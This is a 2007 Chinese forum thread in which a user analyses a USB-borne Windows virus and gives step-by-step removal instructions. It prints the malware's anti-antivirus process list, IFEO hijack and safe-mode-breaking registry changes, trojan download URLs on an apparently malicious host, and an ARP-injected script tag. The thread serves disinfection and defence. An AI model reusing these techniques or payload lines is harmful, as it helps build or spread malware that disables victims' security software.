随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口)

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 12:02 \| 显示全部短消息资料字号：小中大 1楼随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口) 以下情况是本人测试所得，如需转帖，请注明作者（清新阳光）和出处http://hi.baidu.com/newcenturysun/blog/item/2ad3d7cedcea3c0292457e2c.html 谢谢！最近发现很多人出现了打不开杀毒软件反病毒工具甚至带有病毒字样的窗口今天就接到了这样的一个样本先前我发的那个一个坏事做绝的U盘病毒应该就是这个但今天收到的是新变种这是一个可以说结合了几乎所有病毒的特征的病毒除了感染文件之外可以说是比熊猫有过之而无不及！病毒特征： 1.破坏安全模式 2.结束常见杀毒软件以及反病毒工具进程 3.监控窗口 4.关闭自动更新以及Windows安全中心 5.屏蔽显示隐藏文件 6.下载木马 7.IFEO映像劫持分析报告 File: 1201AEC1.exe Size: 36435 bytes MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB SHA1: E760703C8776C652B424FA62AF945434FB786BE5 CRC32: 27CA1195 加壳方式：UPX 病毒运行后在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文件名的dll 和一个同名的dat 文件我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll 这个随机的数字应该与机器码有关该dll插入Explorer进程 Timplatform以及ctfmon进程监视并关闭以下进程以及窗口 AntiVirus TrojanFirewall Kaspersky JiangMin KV200 kxp Rising RAV RFW KAV200 KAV6 McAfe Network Associates TrustPort NortonSymantec SYMANT~1 Norton SystemWorks ESET Grisoft F-Pro Alwil Software ALWILS~1 F-Secure ArcaBit Softwin ClamWin DrWe Fortineanda Software Vba3 Trend Micro QUICKH~1 TRENDM~1 Quick Heal eSafewido Prevx1 ers avg Ikarus SophoSunbeltPC-cilli ZoneAlar Agnitum WinAntiVirus AhnLab Normasurfsecret Bullguard\Blac 360safe SkyNet Micropoint Iparmor ftc mmjk2007 Antiy Labs LinDirMicro Lab Filseclab ast System Safety Monitor ProcessGuard FengYun Lavasoft NOD3 mmsk The Cleaner Defendio kis6Beheadsreng IceSword HijackThis killbox procexp Magicset EQSysSecureProSecurity Yahoo! Google baidu P4P Sogou PXP ardsys 超级兔子木马 KSysFiltsys KSysCallsys AVK K7 Zondex blcorp Tiny Firewall Pro Jetico HAURI CA kmx PCClear_Plus Novatix Ashampoo WinPatrol Spy Cleaner Gold CounterSpy EagleEyeOS Webroot BufferZ avp AgentSvr CCenter Rav RavMonD RavStub RavTask rfwcfg rfwsrv RsAgent Rsaupd runiep SmartUp FileDsty RegClean 360tray 360Safe 360rpt kabaload safelive Ras KASMain KASTask KAV32 KAVDX KAVStart KISLnchr KMailMon KMFilter KPFW32 KPFW32X KPFWSvc KWatch9x KWatch KWatchX TrojanDetector UpLive.EXE KVSrvXP KvDetect KRegEx kvol kvolself kvupload kvwsc UIHost IceSword iparmo mmsk adam MagicSet PFWLiveUpdate SREng WoptiClean scan32 hcfg32 mcconsol HijackThis mmqczj Trojanwall FTCleanerShell loaddll rfwProxy KsLoader KvfwMcl autoruns AppSvc32 ccSvcHst isPwdSvc symlcsvcnod32kui avgrssvc RfwMain KAVPFW Iparmor nod32krn PFW RavMon KAVSetup NAVSetup SysSafe QHSET zxsweep. AvMonitor UmxCfg UmxFwHlp UmxPol UmxAgent UmxAttachment KPFW32 KPFW32X KvXP_1 KVMonXP_1 KvReport KVScan KVStub KvXP KVMonXP KVCenter TrojDie avp.com. krepair.COM KaScrScn.SCR Trojan Virus kaspersky jiangmin rising ikaka duba kingsoft 360safe 木马木馬病毒杀毒殺毒查毒防毒反病毒专杀專殺卡巴斯基江民瑞星卡卡社区金山毒霸毒霸金山社区 360安全恶意软件流氓软件举报报警杀软殺軟防駭在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件删除C:\WINDOWS\system32\verclsid.exe 将其重命名为verclsid.exe.bak 释放41115BDD.exe（随机8位）和autorun.inf到除系统分区外的其他分区 2007-05-29 10:46:21
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	分享到：

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 12:03 \| 显示全部短消息资料字号：小中大 2楼注册表相关操作删除 HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} 破坏安全模式修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值为0x00000000 HKU\S-1-5-21-1085031214-1078145449-839522115-500 \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002 HKU\S-1-5-21-1085031214-1078145449-839522115-500 \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001 屏蔽显示隐藏文件修改常见杀毒软件服务的start键值为0x00000004 如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004 修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start 和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004 关闭自动更新添加IFEO映像劫持项 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe 被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 12:04 \| 显示全部短消息资料字号：小中大 3楼下载dl1.exe到临时文件夹首先下载http://google.xxxx38.org/update/down.txt看病毒主文件（也就是那个8位随机数字或者字母的文件）是否需要更新如果需要更新则下载http://google.xxxx38.org/update/update.exe更新自身然后分别下载http://google.xxxx38.org/update/wow.exe http://google.xxxx38.org/update/mh.exe http://google.xxxx38.org/update/wm.exe http://google.xxxx38.org/update/my.exe http://google.xxxx38.org/update/wl.exe http://google.xxxx38.org/update/zt.exe http://google.xxxx38.org/update/jh.exe http://google.xxxx38.org/update/tl.exe http://google.xxxx38.org/update/1.exe http://google.xxxx38.org/update/2.exe 到program files 文件夹并把他们命名为ycnt1.exe~ycnt10.exe 具体每个文件的生成物就不一一列举了不过值得一提的是ycnt9.exe这个木马他生成C:\WINDOWS\system32\win1ogo.exe 并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码也就是局域网内所有用户在打开网页时都会被插入这段代码所有木马文件植入完毕后生成物如下 C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\system32\msdebug.dll C:\WINDOWS\system32\nwiztlbu.exe C:\WINDOWS\system32\Packet.dll C:\WINDOWS\system32\RemoteDbg.dll C:\WINDOWS\system32\testdll.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\win1ogo.exe C:\WINDOWS\system32\windds32.dll C:\WINDOWS\system32\winpcap.exe C:\WINDOWS\system32\wpcap.dll C:\WINDOWS\system32\xpdhcp.dll C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\Program Files\Common Files\cssrs.exe sreng日志反映如下（在处理一些东西后扫描的这里提前列出） [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> [] <Kvsc><C:\WINDOWS\Kvsc3.exe> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks] <{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\41115BDD.dll> [] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] <Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A] [PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803- 2158)] [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ] [C:\WINDOWS\system32\Kvsc3.dll] [N/A, ] 解决办法如下： 1.确定那个8位随机数的dll的名称这里我们选用winrar确定那个dll的名称方法是：打开winrar.exe 工具查看文件在上面的地址栏中进入c:\program files\common files\microsoft shared\msinfo目录（如图1）我这台被感染的电脑的文件名为41115bdd.dll 2.使用强制删除工具删除那个dll文件这里我们选用Xdelbox1.2这个软件具体使用方法见http://hi.baidu.com/teyqiu/blog/ ... f3b5eece1b3e5a.html（里面有下载地址）重起机器后 3.恢复被映像劫持的软件这里我们使用autoruns这个软件 http://www.skycn.com/soft/17567.html 由于这个软件也被映像劫持了所以我们随便把他改个名字打开这个软件后找到Image hijack (映像劫持）删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe 以外的所有项目 4.此时我们就可以打开sreng了呵呵打开sreng 系统修复高级修复点击修复安全模式在弹出的对话框中点击是 5.恢复显示隐藏文件把下面的代码拷入记事本中然后另存为1.reg文件 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL ] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 "ValueName"="Hidden" "DefaultValue"=dword:00000002 "HKeyRoot"=dword:80000001 "HelpID"="shell.hlp#51105" 双击1.reg把这个注册表项导入好了此时病毒对于我们的所有限制已经解除了下面就是清除其下载的木马了重起机器进入安全模式打开sreng 启动项目注册表删除如下项目 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的 <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> [] <Kvsc><C:\WINDOWS\Kvsc3.exe> [] 双击Userinit 把其键值改为C:\WINDOWS\system32\userinit.exe, 在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”： [CelInDrv / CelInDrv][Stopped/Disabled] <\??\C:\WINDOWS\system32\Drivers\CelInDriver.sys><N/A> 双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定然后删除 C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat（随机8位数字字母组合） C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\WINDOWS\Help\41115BDD.chm（随机8位数字字母组合） C:\WINDOWS\system32\DirectX\DirectX.ini C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\system32\msdebug.dll C:\WINDOWS\system32\nwiztlbu.exe C:\WINDOWS\system32\Packet.dll C:\WINDOWS\system32\RemoteDbg.dll C:\WINDOWS\system32\testdll.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\win1ogo.exe C:\WINDOWS\system32\windds32.dll C:\WINDOWS\system32\winpcap.exe C:\WINDOWS\system32\wpcap.dll C:\WINDOWS\system32\xpdhcp.dll C:\WINDOWS\system32\LYLOADER.EXE C:\WINDOWS\system32\LYMANGR.DLL C:\WINDOWS\41115BDD.hlp（随机8位数字字母组合） C:\WINDOWS\Kvsc3.exe C:\WINDOWS\testexe.exe C:\Program Files\Common Files\cssrs.exe C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话）还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe（随机8位数字字母组合）一定不要双击最好的方法是用winrar看 5.26 update:刚刚发现病毒主程序更新了新版本的主程序的相关信息 File: update.exe Size: 36435 bytes MD5: 981A3D735B65F85ADF72EB00CBE7E342 SHA1: F96C27CA5D8380D07C571CB4A5EA95838E1C8B92 CRC32: EB10E247 并且下载的木马也有变化 http://google.xxxx38.org/update/1.exe 有变化新病毒的版本为2007-5-26-21：50的版本清除方法已经更新
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 12:08 \| 显示全部短消息资料字号：小中大 4楼附图1 附件: 文件名:5543452007526115912.jpg 下载次数:437 文件类型:image/pjpeg 文件大小: 上传时间:2007-5-26 12:08:34 描述:
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 12:09 \| 显示全部短消息资料字号：小中大 5楼图2 附件: 文件名:5543452007526115958.jpg 下载次数:442 文件类型:image/pjpeg 文件大小: 上传时间:2007-5-26 12:09:31 描述:
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

社区嘉宾

帖子:15158
注册: 2005-08-03
来自:

发表于： 2007-05-26 12:14 | 显示全部 短消息资料

字号：小中大 6楼

引用:

【孤独更可靠的贴子】好像又更新了```````````````

我测试时候没释放那么多`````
………………

呵呵发现他下了很多木马

社区嘉宾

帖子:15158
注册: 2005-08-03
来自:

发表于： 2007-05-26 13:25 | 显示全部 短消息资料

字号：小中大 7楼

引用:

【loveperday的贴子】昨天晚上领教过了，不过观察水平不够。
问下楼主，win1ogo.exe这个文件的行为你通过什么观察的？SSM?
………………

嗯 SSM

社区嘉宾

帖子:15158
注册: 2005-08-03
来自:

发表于： 2007-05-26 13:42 | 显示全部 短消息资料

字号：小中大 8楼

引用:

【PANDAPANDA的贴子】这里我们选用winrar确定那个dll的名称
方法是：打开winrar.exe
工具查看文件
在上面的地址栏中进入c:\program files\common files\microsoft shared\msinfo目录
汗。。。抖抖地问句
用WINRAR，即使是隐藏文件也可以看到是么？
小白提问。。。不好意思
………………

是

社区嘉宾

帖子:15158
注册: 2005-08-03
来自:

发表于： 2007-05-26 13:58 | 显示全部 短消息资料

字号：小中大 9楼

引用:

【lovepediy的贴子】发个样本看看
………………

已发

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 14:46 \| 显示全部短消息资料字号：小中大 10楼如果确认中了这个病毒需要按照解决方法中的步骤一步一步做下去可以加我QQ 通过悄悄话发给你
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-05-26 12:02 \| 显示全部短消息资料字号：小中大 1楼随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口) 以下情况是本人测试所得，如需转帖，请注明作者（清新阳光）和出处http://hi.baidu.com/newcenturysun/blog/item/2ad3d7cedcea3c0292457e2c.html 谢谢！最近发现很多人出现了打不开杀毒软件反病毒工具甚至带有病毒字样的窗口今天就接到了这样的一个样本先前我发的那个一个坏事做绝的U盘病毒应该就是这个但今天收到的是新变种这是一个可以说结合了几乎所有病毒的特征的病毒除了感染文件之外可以说是比熊猫有过之而无不及！病毒特征： 1.破坏安全模式 2.结束常见杀毒软件以及反病毒工具进程 3.监控窗口 4.关闭自动更新以及Windows安全中心 5.屏蔽显示隐藏文件 6.下载木马 7.IFEO映像劫持分析报告 File: 1201AEC1.exe Size: 36435 bytes MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB SHA1: E760703C8776C652B424FA62AF945434FB786BE5 CRC32: 27CA1195 加壳方式：UPX 病毒运行后在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文件名的dll 和一个同名的dat 文件我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll 这个随机的数字应该与机器码有关该dll插入Explorer进程 Timplatform以及ctfmon进程监视并关闭以下进程以及窗口 AntiVirus TrojanFirewall Kaspersky JiangMin KV200 kxp Rising RAV RFW KAV200 KAV6 McAfe Network Associates TrustPort NortonSymantec SYMANT~1 Norton SystemWorks ESET Grisoft F-Pro Alwil Software ALWILS~1 F-Secure ArcaBit Softwin ClamWin DrWe Fortineanda Software Vba3 Trend Micro QUICKH~1 TRENDM~1 Quick Heal eSafewido Prevx1 ers avg Ikarus SophoSunbeltPC-cilli ZoneAlar Agnitum WinAntiVirus AhnLab Normasurfsecret Bullguard\Blac 360safe SkyNet Micropoint Iparmor ftc mmjk2007 Antiy Labs LinDirMicro Lab Filseclab ast System Safety Monitor ProcessGuard FengYun Lavasoft NOD3 mmsk The Cleaner Defendio kis6Beheadsreng IceSword HijackThis killbox procexp Magicset EQSysSecureProSecurity Yahoo! Google baidu P4P Sogou PXP ardsys 超级兔子木马 KSysFiltsys KSysCallsys AVK K7 Zondex blcorp Tiny Firewall Pro Jetico HAURI CA kmx PCClear_Plus Novatix Ashampoo WinPatrol Spy Cleaner Gold CounterSpy EagleEyeOS Webroot BufferZ avp AgentSvr CCenter Rav RavMonD RavStub RavTask rfwcfg rfwsrv RsAgent Rsaupd runiep SmartUp FileDsty RegClean 360tray 360Safe 360rpt kabaload safelive Ras KASMain KASTask KAV32 KAVDX KAVStart KISLnchr KMailMon KMFilter KPFW32 KPFW32X KPFWSvc KWatch9x KWatch KWatchX TrojanDetector UpLive.EXE KVSrvXP KvDetect KRegEx kvol kvolself kvupload kvwsc UIHost IceSword iparmo mmsk adam MagicSet PFWLiveUpdate SREng WoptiClean scan32 hcfg32 mcconsol HijackThis mmqczj Trojanwall FTCleanerShell loaddll rfwProxy KsLoader KvfwMcl autoruns AppSvc32 ccSvcHst isPwdSvc symlcsvcnod32kui avgrssvc RfwMain KAVPFW Iparmor nod32krn PFW RavMon KAVSetup NAVSetup SysSafe QHSET zxsweep. AvMonitor UmxCfg UmxFwHlp UmxPol UmxAgent UmxAttachment KPFW32 KPFW32X KvXP_1 KVMonXP_1 KvReport KVScan KVStub KvXP KVMonXP KVCenter TrojDie avp.com. krepair.COM KaScrScn.SCR Trojan Virus kaspersky jiangmin rising ikaka duba kingsoft 360safe 木马木馬病毒杀毒殺毒查毒防毒反病毒专杀專殺卡巴斯基江民瑞星卡卡社区金山毒霸毒霸金山社区 360安全恶意软件流氓软件举报报警杀软殺軟防駭在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件删除C:\WINDOWS\system32\verclsid.exe 将其重命名为verclsid.exe.bak 释放41115BDD.exe（随机8位）和autorun.inf到除系统分区外的其他分区 2007-05-29 10:46:21
